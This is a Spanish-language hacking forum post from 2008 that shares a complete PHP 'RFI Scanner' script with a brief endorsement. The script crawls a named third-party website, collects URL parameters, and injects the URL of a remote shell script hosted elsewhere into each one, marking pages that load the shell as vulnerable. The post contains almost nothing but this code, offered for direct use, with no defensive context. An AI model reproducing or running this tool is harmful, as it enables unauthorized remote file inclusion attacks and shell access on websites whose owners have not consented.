Te invitamos a descargar el Windows XP SP3 Versión Polaxia - XPyro
Polaxia.com - Seguridad Informatica y Hacking - Hack General - RFI Scanner (PHP)
Páginas: [1]   Ir Abajo
« anterior próximo »
Imprimir
Autor Tema: RFI Scanner (PHP)  (Leído 255 veces)
0 Usuarios y 1 Visitante están viendo este tema.
SuB_7
Moderador a Prueba
Ya se postear
**

Gracias recibidos: 34
Desconectado Desconectado

Sexo: Masculino
Mensajes: 110


Metete con el mejor y muere como el resto


Ver Perfil
« en: Octubre 04, 2008, 08:47:50 »
<?
/*
RFI Scanner 1.0
Author: elefrEn
Website: http://hide-url.net/descargar/dWdnYzovL3J5cnNlcmEucGJ6Lw==.html
email: efnworkz@hotmail.com

Dedicated to Spanish Hackers Team - http://hide-url.net/descargar/dWdnYzovL2ZjbmF2ZnUtdW5weHJlZi5wYnov.html
Gr33tz: -> JosS | nhh-32 | Omega <-
*/

set_time_limit(0);

#Config
$urlweb = "www.guia-ubuntu.org";# Out http://, ex: google.com
$urlshell = "http://hide-url.net/descargar/dWdnYzovL2hmaG5ldmJmLnlscGJmLnJmL2owZXpmL2U1Ny50dnM=.html";# Url where you sent the shell script
$comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc...
$filetoscan = "index.php";# The file that you want scan

#Funcs
function vars($url){
    $xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
    $var = 0;
    while($var < count($xpl)){
        $v4r = explode("=",$xpl[$var]);
        $m0s .= '|'.$v4r[0];
        $var++;
    }
    $m0s = str_replace('amp;','',$m0s);
    return $m0s;
}
function beerres($list, $barras = FALSE){
    $s3p4 = '<br>';
    if($barras) $s3p4 = '|';
    $list = explode('|',$list);
    $var = 0;
    while($var < count($list)){
        if($list[$var] != ''){
            if(!@preg_match("/$list[$var]/i",$m0s) ){
                $m0s .= $list[$var].$s3p4;
            }
        }
        $var++;
    }
    return $m0s;
}
function extrac($n00b, $file = FALSE){
    $n0ob = 'http://'.$n00b;
    $source = join("",file(&$n0ob));
    $vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
    $t0t = count($results[1]);
    $var = 0;
    while($var < $t0t){
        $xtr = explode('"',$results[1][$var]);
        $urllist .= $xtr[0].'|';
        $varlist .= vars($xtr[0]);
        $var++;
    }
    $m0s .= $varlist;
    return beerres($m0s,1);
}
function rfi($vars,$web,$file,$urlshell){
    $list = explode('|',$vars);
    $var = 0;
    while($var < count($list)){
        $url = $web.$file."?".$list[$var]."=".$urlshell."?";
        $source = join("",file(&$url));
        if(preg_match("/shell/i",$source)){
            $m0s .= "<font color=red><b>RFI-></b></font> ";
        }else{
            $m0s .= "<font color=green><b>Secure-></b></font> ";
        }
        $m0s .= $url.'<br>';
        $var++;
    }
    return $m0s;
}

#Exec
echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
?>


wueno aca les dejo este code que esta muy wueno lo pegan en un txt y lo cambian por un .php sin nada mas k decir saludos  Cool
En línea
Páginas: [1]   Ir Arriba
Imprimir
« anterior próximo »
Ir a:  

¿Como postear en Polaxia? - ¿Quieres subir una imagen al foro? - Subir archivos - F.A.Q - Registrarse